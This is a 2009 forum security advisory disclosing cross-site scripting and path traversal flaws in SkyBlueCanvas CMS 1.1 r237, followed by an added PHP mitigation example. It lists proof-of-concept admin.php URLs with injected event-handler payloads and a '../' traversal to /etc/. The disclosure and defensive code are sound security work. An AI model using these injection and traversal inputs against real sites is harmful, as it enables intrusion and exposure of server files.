InterN0T - Advisories: advisories that are found by members of InterN0T.

Posted by MaXe (The Founder), 12th June 2009, 21:51
[InterN0T] SkyBlueCanvas 1.1 r237 - Multiple Vulnerabilities

SkyBlueCanvas - XSS and Path Content Disclosure Vulnerabilities

Version Affected: 1.1 r237 (newest version: 1.1 r246)

Info: SkyBlueCanvas Lightweight CMS is an open source, free
content management system written in php and built specifically
for small web sites. The entire site you are viewing is a
demonstration of the SkyBlueCanvas lightweight CMS.
SkyBlueCanvas is custom-built for those instances when more
robust systems like Joomla, WordPress and Drupal are too much
horsepower.

Credits: InterN0T

External Links:
http://www.skybluecanvas.com


-:: The Advisory ::-
Vulnerable Function / ID Calls:
mgroup, mgr, objtype, id & dir.

Cross Site Scripting: (requires administrator access - will not survive a login screen)
http://[HOST]/skybluecanvas/admin.php?mgroup=" onmouseover=alert(0) > &mgr=email&objtype=email&sub=viewemail&id=2
http://[HOST]/skybluecanvas/admin.php?mgroup=collections&mgr=" onmouseover=alert(0) > &com=manager

Impossible XSS: (XML errors or hidden tags preventing use of event handlers.)
http://[HOST]/skybluecanvas/admin.php?mgroup=pages&mgr=page&objtype=XSS
http://[HOST]/skybluecanvas/admin.php?mgroup=settings&mgr=configuration&objtype=">XSS
http://[HOST]/skybluecanvas/admin.php?mgroup=pages&mgr=page&objtype=page&sub=editpage&id=" onfocus=alert(0) >
http://[HOST]/skybluecanvas/admin.php?mgrou=pictures&mgr=media&dir='XSS

Path Content Disclosure: (requires admin privileges)
http://[HOST]/skybluecanvas/admin.php?mgrou=pictures&mgr=media&dir=../../../../../../../etc/
-- This was done in a folder where /skybluecanvas was located in: /var/www/somesite.tld/awebdir/skybluecanvas/
--=-- In the above, if One goes to a folder with many subdirectories the above will fail due to a memory allocation flaw.

Path Disclosure: (requires admin privileges)
http://[HOST]/skybluecanvas/admin.php?mgroup=pictures&mgr=media&objtype=media&dir=all&sub=move&id='
http://[HOST]/skybluecanvas/admin.php?mgroup=pictures&mgr=media&objtype=media&dir=all&sub=rename&id='

-:: Solution ::-
Filter event handlers out from function calls.

Conclusion:
Pretty secure system overall but if One is a little inventive, then the above issues might be exploitable.

Disclosure Information:
- Vulnerabilities found, researched and confirmed between 5th to 10th June.
- Advisory finished and published on InterN0T the 12th June.
- Vendor and Bugtraq (SecurityFocus) contacted the 12th June.


All of the best,
MaXe
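As an added illustration (not SkyBlueCanvas's own code), the PHP below shows the two mitigations the advisory's solution points at: escaping any value that is reflected into an HTML attribute, and confining the media `dir` parameter to a fixed root so `../` sequences cannot list arbitrary directories. `MEDIA_ROOT`, `KNOWN_GROUPS` and the helper function names are assumptions, not names from the CMS.

```php
<?php
// Added illustration, not SkyBlueCanvas code: hardened handling of the
// parameters named in the advisory. MEDIA_ROOT, KNOWN_GROUPS and the
// helper names are assumptions.
const MEDIA_ROOT   = '/var/www/example/skybluecanvas/data/media';
const KNOWN_GROUPS = ['pages', 'collections', 'settings', 'pictures'];
// Allow-list manager/group names instead of echoing whatever was sent.
function safe_group(string $raw): string {
    return in_array($raw, KNOWN_GROUPS, true) ? $raw : 'pages';
}

// Anything still reflected into an HTML attribute goes through
// htmlspecialchars with ENT_QUOTES, so a `"` cannot close the attribute
// and introduce an onmouseover= handler as in the advisory's PoC URLs.
function attr(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Confine `dir` to MEDIA_ROOT: resolve the candidate, then require that it
// is the root itself or a descendant. "../../../../etc/" fails this check.
function safe_media_dir(string $raw): ?string {
    $root = realpath(MEDIA_ROOT);
    if ($root === false || strpos($raw, "\0") !== false) {
        return null;
    }
    $candidate = realpath($root . DIRECTORY_SEPARATOR . $raw);
    if ($candidate === false) {
        return null; // missing, or escaped the root via ../ or a symlink
    }
    if ($candidate !== $root && strpos($candidate, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null; // resolved to a path outside the media root
    }
    return $candidate;
}

// In the admin page: ids are cast to int so a stray `'` cannot raise a
// warning that leaks the install path; a bad dir gets a plain 400 rather
// than a PHP warning (keep display_errors off in production as well).
$group = safe_group($_GET['mgroup'] ?? 'pages');
$id    = (int) ($_GET['id'] ?? 0);
$dir   = safe_media_dir($_GET['dir'] ?? '.');
if ($dir === null) {
    http_response_code(400);
    exit('Invalid directory.');
}
echo '<input type="hidden" name="mgroup" value="' . attr($group) . '">';
foreach (array_diff(scandir($dir), ['.', '..']) as $entry) {
    echo '<li>' . attr($entry) . '</li>';
}
```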
LinkBacks to this thread (http://forum.intern0t.net/intern0t-advisories/1120-intern0t-skybluecanvas-1-1-r237-multiple-vulnerabilities.html):
- CVE - CVE-2009-2116 (under review) (Refback, 28th January 2010 08:45)
- ISS X-Force Database: skybluecanvas-admin-path-disclosure(51164): SkyBlueCanvas admin.php path disclosure (Refback, 22nd June 2009 17:21)
- SkyBlueCanvas Cross-Site Scripting Vulnerabilities - Secunia Advisories - Vulnerability Information - Secunia.com (Refback, 16th June 2009 16:56)
